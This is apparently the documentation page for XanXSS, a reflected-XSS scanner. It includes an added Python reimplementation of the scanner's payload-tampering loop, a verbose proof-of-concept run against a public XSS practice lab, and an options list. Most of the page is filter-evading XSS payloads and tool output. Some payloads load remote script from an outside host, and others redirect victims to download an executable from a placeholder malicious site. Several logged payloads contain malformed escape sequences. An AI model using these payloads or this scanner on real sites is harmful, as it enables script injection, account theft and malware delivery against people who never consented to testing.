XanXSS - A Simple XSS Finding Tool

XanXSS is a reflected XSS searching tool (DOM coming soon) that creates payloads based on templates. Unlike other XSS scanners that just run through a list of payloads, XanXSS tries to make the payload unidentifiable, for example:
<xAnXSS</TitLE></STYLE><SVG/ONload='alERt(1);'/></XaNxSs</titLe></StYlE><SvG/ONlOAD='alerT(1);'/> <ifrAmE&#13;Src=&#160;[2].Find(CoNfirm);=&#160;"JAVaScRIpT:proMpT(1))"javAscrIpt:/*--></scRIPt> />cLIcK&#13;Me!</b</TextaRea></TiTLE><BUTtON ONcLIck='aleRT(1);'/>XaNxss</TEXTaRea> <iMG&#13;sRc=%0acONfIRM();=+'jAVASCRiPT:alerT("XSS");'</STYlE><Svg/onLoad='alErT((1));'/>
With XanXSS every payload is different. XanXSS works by running through the payloads until a specified number of working payloads is found or a timer hits the max time, which prevents it from looping for too long. Some of the features included in XanXSS:
  • Ability to pass your own headers using -H
  • Ability to generate a polyglot script using -P
  • Ability to run behind a proxy using --proxy
  • And many more
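To make the template -> tamper -> run-until-found-or-timeout loop described above concrete, here is a miniature version written for this page. It is an added example, not XanXSS's own code: the tamper rules (random case on markup, spaces swapped for the entity and URL-encoded stand-ins seen in the payloads above), the function names (tamper, is_reflected, find_working, make_target) and the fake "server" are my own constructions. The fake target models two pages: one that reflects the query parameter raw (vulnerable) and one that HTML-escapes it (safe), so the whole thing runs offline.

```python
"""Added example: a small reflected-XSS search loop in the style of XanXSS.
Not the tool's code; the tamper rules and the fake target are assumptions."""
import html
import random
import re
import time
from typing import Callable, List, Optional
from urllib.parse import unquote

# Payload templates (constructed for this example). {mark} is filled with a
# per-attempt number so every generated payload is distinct.
TEMPLATES: List[str] = [
    "<svg onload='alert({mark});'/>",
    "<img src=x onerror='confirm({mark});'>",
    "<button onclick='prompt({mark});'/>click me!",
]

# Whitespace stand-ins of the kind visible in the post's payloads. "/" is a
# parser-safe attribute separator; the entity and %xx forms only survive if the
# target decodes them before reflecting, which is exactly what the check tests.
WHITESPACE_SUBS = ["/", "&#13;", "&#160;", "%0a", "%0d", "%09"]


def random_case(text: str, rng: random.Random) -> str:
    """Tag and attribute names are case-insensitive in HTML, so mixing case
    changes the bytes a naive filter sees without changing the markup."""
    return "".join(c.upper() if rng.random() < 0.5 else c.lower() for c in text)


def tamper(template: str, mark: str, rng: Optional[random.Random] = None) -> str:
    """Fill the template, then randomise case and whitespace outside the quoted
    JavaScript. The JS is left alone: alErT is not alert, identifiers are case-sensitive."""
    rng = rng or random.Random(0)
    payload = template.format(mark=mark)
    out = []
    for i, part in enumerate(re.split(r"('[^']*')", payload)):
        if i % 2 == 1:  # odd parts are the quoted JS strings
            out.append(part)
            continue
        part = random_case(part, rng)
        part = re.sub(r" ", lambda _m: rng.choice(WHITESPACE_SUBS), part)
        out.append(part)
    return "".join(out)


def is_reflected(body: str, payload: str) -> bool:
    """A hit means the payload came back verbatim. Servers URL-decode the query
    string before reflecting it, so compare the decoded form. If the page
    HTML-escaped it, '<' is now '&lt;' and this correctly fails. Note that a
    verbatim reflection proves the parameter is unencoded, not that the tampered
    markup parses; confirm a reported payload in a browser."""
    return unquote(payload) in body


def find_working(fetch: Callable[[str], str], templates: List[str], amount: int = 3,
                 max_time: float = 35.0, verify: int = 5, seed: int = 0) -> List[str]:
    """Run tampered payloads until `amount` are found or `max_time` seconds pass.
    Each candidate is re-requested `verify` times (the -a idea): a one-off
    reflection from a cached or rotating page must not be reported as working."""
    rng = random.Random(seed)
    found: List[str] = []
    deadline = time.monotonic() + max_time
    tries = 0
    while len(found) < amount and time.monotonic() < deadline:
        template = templates[tries % len(templates)]
        tries += 1
        payload = tamper(template, str(tries), rng)
        if all(is_reflected(fetch(payload), payload) for _ in range(verify)):
            found.append(payload)
    return found


def make_target(escape_output: bool) -> Callable[[str], str]:
    """Constructed stand-in for an HTTP GET to a search page; the real tool
    would send the payload as the query parameter of the URL given with -u."""
    def fetch(query: str) -> str:
        value = unquote(query)                      # servers decode %xx first
        if escape_output:
            value = html.escape(value, quote=True)  # safe page: markup becomes text
        return "<html><body>Sorry, no results were found for <b>" + value + "</b>.</body></html>"
    return fetch


if __name__ == "__main__":
    for name, target in (("raw reflection", make_target(False)), ("escaped output", make_target(True))):
        hits = find_working(target, TEMPLATES, amount=3, max_time=2.0, verify=2)
        print(f"{name}: found a total of {len(hits)} working payloads")
        for hit in hits:
            print("    >", hit)
```

Against the raw-reflecting target the loop stops after three hits; against the escaping target it runs out the clock and reports nothing, which is the behaviour you want from a scanner whose only oracle is reflection.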

Proof of Concept
For this proof of concept we will use https://xss-game.appspot.com/level1/frame
admin@TBG-a0216: /bin/python/xanxss$ python xanxss.py -u "http://xss-game.appspot.com/level1/frame?query=" -a 12 -t 12 -f 25 -v

    ____  ___             ____  ___  _________ _________
    \   \/  /____    ____ \   \/  / /   _____//   _____/
     \     /\__  \  /    \ \     /  \_____  \ \_____  \
     /     \ / __ \|   |  \/     \  /        \/        \
    /___/\  (____  /___|  /___/\  \/_______  /_______  /
          \_/    \/     \/      \_/        \/        \/

Twitter->   @stay__salty
Github -->  ekultek
Version---> v(0.1)

[info][16:37:34] using default payloads
[info][16:37:34] generating payloads
[info][16:37:34] running payloads through tampering procedures
[info][16:37:34] payloads tampered successfully
[info][16:37:34] running payloads
[debug][16:37:34] running payload '<xanxsSjAvasCRipT:/*--></SCripT></xanXsS</Style><svG/Onload='ALERt((1);'/>'
[debug][16:37:34] running payload '<SCRipt&#13;Src=+(pRomPt))``;=%09'HtTP://xsS.ROCKs/xss.jS'jaVAsCRIpt:/*--></ScrIPt></Script</tiTLe></stYLe><Svg/OnLOaD='aLeRT(1);'/>'
[debug][16:37:34] running payload '<xanxssjAvASCRIpT:/*--></ScRiPt></XANxsS</tiTle></STyle><SvG/OnLOAD\u006c='aLErt(1);'/>'
[debug][16:37:34] running payload '<iMG/+/sRc=%0dA=%0DPrOMpt,a(();=%0a'JaVaSCripT:aLeRt("XSS"));'javasCRiPT:/*--></sCRipt>'
[debug][16:37:34] running payload '<SCRIPT/*/srC=&#34;&#62;A=%0aprompT,A(();=%09'htTp://xSs.rockS/XSs.Js'</TeXTARea></TiTLE><buTTOn oncLiCK='ALeRT(1);'/>XAnXsS</tEXTARea></scrIPTjaVaSCRipT:/*--></sCRIPt>'
[debug][16:37:35] running payload '<IMg&#160;SRC=%09CONFIRM(());=%0a'JavAscrIpt:aLERt("XSS");'JavasCrIpT:/*--></SCripT>'
[debug][16:37:35] running payload '<XAnXSS</STYlE><SVg/OnLOAd='aLeRT(1));'/></xAnXsSjaVasCRIpt:/*--></scrIpt>'
[debug][16:37:35] running payload '<sCRIPt`Src=+cOnFiRm());=+'htTP://xSs.rOCKs/xsS.js'</TextaREA></tiTle><ButTon ONCliCK='AlErt(1);'/>xanxSS</TeXTarEa></SCriPtJAvaScrIPt:/*--></SCrIpt>'
[debug][16:37:35] running payload '<scRIpT</title></stYle><sVG/onlOAD='AlERT(1));'/>aLert((1));</scRipT</titLE></STyLe><sVG/oNlOad='aLeRt((1));'/>'
[debug][16:37:35] running payload '<SC\u009lripT/*/SrC=%0aConFirm();=&#160;'hTTP://xsS.ROcks/xSs.js'</TITle></StYlE><svg/ONLOad='ALerT(1);'/></ScriPT</StyLe><svG/OnLOAd='ALert((1);'/>'
[debug][16:37:35] running payload '<B//ONMOuSEOver=&#34;&#62;ConFIrm(();=&#160;wIndow.LoCATIoN=&#160\u005g;(pRoMPT))``;=%0A'htTpS://MyBaDSitE.cOM/dOwnLoAd.phP?iTem=+(pRomPt)``;=%0apuMPEDuPkICKs.exE'jaVAScrIpt:/*--></sCrIPt>ClIcK/*/mE!</b</tiTLe></sTyLE><sVG/OnLoAd='aLert(1));'/>'
[debug][16:37:35] running payload '<IfRA\u007pmeSrC=%0AcOnFIRm(());=%0a"jaVAScriPT:pRoMPT(1)"jAVaScRIpt:/*--></SCriPt>'
[debug][16:37:36] running payload '<IframE//SrC=&#34;&#62;CONfIRM());=%0d"jAvAscriPT:pROMpT(1)"</TeXtarEa></TiTLe><BUttoN oNcliCK='aLERt((1));'/>XanXss</texTAReA>'
[debug][16:37:36] running payload '<iMG/+/SRc=%09[3].FInd(COnFIRm));=&#34;&#62;'javAscriPt:A\u004pLerT("XSS");'JavaSCriPt:/*--></sCripT>'
[debug][16:37:36] running payload '<imG&#160;SRc=%0d[2].FinD(cOnFiRm));=&#160;'JaVaScRipt:ALERt("XSS"));'</styLe><SVg/oNLoad='ALErT(1));'/>'
[debug][16:37:36] running payload '<script</tITLE></style><SVG/onLOAD='alerT(1);'/>AleRt(1);</ScRIpTjAvASCrIPT:/*--></scRIPt>'
[debug][16:37:36] running payload '<XaNxSs</tITle></sTYlE><SVg/ONload='aLERT((1);'/></xANxsS</stYLE><Svg/OnlOAD='AleRt(1);'/>'
[debug][16:37:36] running payload '<b//ONmOUSEoVEr=%0D[8].fInd(coNfIrM);=%09WinDoW.location=%0A(COnfiRm)(();=&#160;'htTPS://MYBadsite.cOM/DoWNlOaD.php?ITEm=+COnFIrM();=+puMPEDupKickS.ExE'</styLe><sVG/OnLOAd='alERt((1);'/>CLickMe!</b</sTYlE><SVG/onloAD='AlERt(1);'/>'
[debug][16:37:37] running payload '<scriPT</styLE><SvG/ONloaD='aLERT(1);'/>ALeRt(1);</SCrIPt</tiTLe></STYlE><sVG/OnloAd='aLeRT(1\u009x);'/>'
[debug][16:37:37] running payload '<iFRamEsrC=&#34;&#62;[7].FInD(cOnFiRm);=%0A"javAsCRipT:prompt(1))"</tITlE\u009e></sTyle><svg/oNLOad='alert((1);'/>'
[debug][16:37:37] running payload '<b/*/OnmOusEOver=&#160;A=%0apROMpt,A();=+wINdOW.LOCAtIon=&#34;&#62;co\U006EfiR\u006\u003id();=%09'HTtPS://MYBAdsiTE.com/doWNload.php?itEm=+((CoNfIrm)();=&#34;&#62;puMpedUPKickS.eXe'</teXtaREa></tiTLe><BUTTON oNclIck='aLeRT((1);'/>XanXsS</texTAREA>cLICk/*/Me!</B</StylE><SVG/ONloAd='aLERt((1));'/>'
[debug][16:37:37] running payload '<XANxSSJaVaScRIpt:/*--></SCripT></XAnXSs</TExtAREa></tITle\u008w><b\u009fuTTON oNclIck='Ale\u003rRT((1);'/>xANXss</TEXTArEA>'
[debug][16:37:37] running payload '<SCript/*/sRC=+A=&#160;prOmpt,A();=&#160;'HtTp://XsS.rocKS/xsS.JS'</stylE><sVG/onLoad='AlErT((1);'/></SCriptjAvaScriPt:/*--></ScrIpt>'
[debug][16:37:37] running payload '<ImG&#13;SRc=&#34;&#62;Co\U006efIr\u006D();=%0a\u007u'javAsCript:AlerT(("XSS");'</titlE></StYLe><svg/onloAD='alERt(1);'/>'
[debug][16:37:38] running payload '<B/*/ONmouSeOvEr=%0Aa=&#160;prOmpT,A();=%09WIndOw.LOCAtION=%0Aa=%09prompt,a();=%0A'hTTps://MYBadsITe.COM/DOWNLOAD.PHp?ITeM=&#160;cO\u006Efir\u006D());=%0dPumPeduPkicks.EXE'</tITlE></StyLE><svg/OnlOAD='aLerT((1));'/>clIcK&#13;mE!</bJavASCript:/*--></sCrIPT>'
[warning][16:37:48] times up dumping found
[info][16:37:48] working payloads:
--------------------------------------------------
    > <xanxssjAvASCRIpT:/*--></ScRiPt></XANxsS</tiTle></STyle><SvG/OnLOAD\u006c='aLErt(1);'/>
    > <SCRipt&#13;Src=+(pRomPt))``;=%09'HtTP://xsS.ROCKs/xss.jS'jaVAsCRIpt:/*--></ScrIPt></Script</tiTLe></stYLe><Svg/OnLOaD='aLeRT(1);'/>
    > <xanxsSjAvasCRipT:/*--></SCripT></xanXsS</Style><svG/Onload='ALERt((1);'/>
--------------------------------------------------
[info][16:37:48] found a total of 3 working payloads
admin@TBG-a0216: /bin/python/xanxss$
Now let's check those scripts in the HTML of the website:
Payload: <xanxssjAvASCRIpT:/*--></ScRiPt></XANxsS</tiTle></STyle><SvG/OnLOAD\u006c='aLErt(1);'/>


Payload: <SCRipt&#13;Src=+(pRomPt))``;=%09'HtTP://xsS.ROCKs/xss.jS'jaVAsCRIpt:/*--></ScrIPt></Script</tiTLe></stYLe><Svg/OnLOaD='aLeRT(1);'/>


Payload: <xanxsSjAvasCRipT:/*--></SCripT></xanXsS</Style><svG/Onload='ALERt((1);'/>


Options
XanXSS comes complete with the ability to use a proxy, is compatible with proxychains, and allows you to add custom headers. I have provided a full list of options for your convenience:
usage: xanxss.py [-h] [-u http://test.com/test.php?id=] [-a VERIFY]
                 [-f AMOUNT] [-t TIME] [-p SCRIPT, [SCRIPT, ...]]
                 [-F FILE-PATH] [-v] [--proxy TYPE://IP:PORT]
                 [-H HEADER=VALUE,HEADER:VALUE] [--throttle TIME secs] [-P]

optional arguments:
  -h, --help            show this help message and exit
  -u http://test.com/test.php?id=, --url http://test.com/test.php?id=
                        pass a URL to test for XSS vulnerabilities. it is
                        recommended that you use a URL with a query parameter
  -a VERIFY, --amount VERIFY
                        how many verification steps to be taken, this will
                        determine how reliable the payload is. the more
                        verification steps the more reliable the payload will
                        be (*default=5)
  -f AMOUNT, --find AMOUNT
                        attempt to find this amount of working payloads,
                        specifying this does not guarantee you will find this
                        amount of working payloads (*default=25)
  -t TIME, --time TIME  amount of time in seconds to spend testing, this
                        will be used as a timer for the verification
                        (*default=35s)
  -p SCRIPT, [SCRIPT, ...], --payloads SCRIPT, [SCRIPT, ...]
                        pass a comma separated list of your own payloads, must
                        contain at least 5 payloads
  -F FILE-PATH, --file FILE-PATH
                        pass a text file containing payloads one per line,
                        must contain at least 5 payloads
  -v, --verbose         run in verbose mode and display more output
                        (*default=False)
  --proxy TYPE://IP:PORT
                        pass a proxy in the format type://ip:port
  -H HEADER=VALUE,HEADER:VALUE, --headers HEADER=VALUE,HEADER:VALUE
                        add your own custom headers to the request
                        (*default=connection,user-agent)
  --throttle TIME (secs)
                        throttle each request with a sleep time (*default=0)
  -P, --polyglot        generate a polyglot script to append to the end of the
                        running scripts, if there is XSS this should find it
                        (*default=False)

